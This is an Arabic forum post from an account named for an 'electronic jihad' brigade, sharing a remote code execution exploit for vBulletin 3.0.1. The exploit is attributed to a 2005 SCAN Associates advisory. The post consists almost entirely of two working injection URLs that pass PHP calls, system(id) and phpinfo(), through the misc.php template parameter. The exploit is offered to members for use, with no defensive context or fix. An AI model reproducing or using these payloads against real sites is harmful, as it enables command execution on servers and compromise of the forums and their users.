Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ثغرة نوع PHP


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
ثغرة نوع PHP
Permalink   
 


 

سلام عليكم ورحمة الله وبراكاته

Tested on vBulletin Version 3.0.1 /str0ke

http://www.xxx.net/misc.php?do=page&template={${system(id)}}

[SCAN Associates Security Advisory]

http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
====================

ظهرت بتاريخ 2005-02-22
ومكتشفها pokley


بالتوفيق للجميع


 



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard